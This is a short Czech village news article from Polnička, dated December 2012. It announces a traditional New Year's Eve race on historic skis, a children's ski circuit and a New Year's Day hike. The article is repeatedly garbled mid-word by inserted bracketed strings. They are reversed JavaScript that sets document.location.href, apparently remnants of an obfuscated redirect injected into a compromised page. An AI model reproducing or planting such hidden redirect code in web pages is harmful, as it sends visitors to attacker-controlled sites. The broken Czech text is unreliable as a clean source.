Polnička, polnicka, aktuality, závody, lyžaři
Rainbow page separator

V Polničce odstartuje 43. ročník lyžařských závodů

Pátek, 28. prosince 2012

Polnička / Na počasí příliš nezáleží při tradičním Silvestrovském běhu na his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torických lyžích, který se každým rokem koná v Polničce u Žďáru nad Sázavou. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos už třiačtyřicátým rokem. Podmínkou jsou dobové lyže (děti mají povoleny současné), vítán je odpovídající his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torický oděv a nutností je dobrá nálada. Pokud počasí nepřeje, lyžníci musejí vzdálenost od startu do cíle zdolat kupříkladu i s lyžemi přes rameno. V minulosti se už při naprosté absenci sněhu závod změnil i v běh s trakařem a na něm umístěným sudem piva. „Akce se obvykle aktivně účastní několik desítek dětí i dospělých, více ale bývá těch, kteří závodníky přijdou povzbudit,“ poznamenal mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Polničky Luboš Zeman.

Pro děti je připraven „skutečný“ lyžařský okruh, v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě se nejedná o recesi, ale o opravdové lyžařské závody, dobové oblečky ani lyže požadovány nejsou. Akce startuje v pondělí 31. prosince v 10 hodin dopoledne před Restaurací Polnička.

Pro odolné jedince je poté určena následující akce, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tradiční novoroční výšlap do okolí obce, který po silvestrovských oslavách v úterý 1. ledna ve 13 hodin pořádá turistický oddíl TJ Sokol Polnička.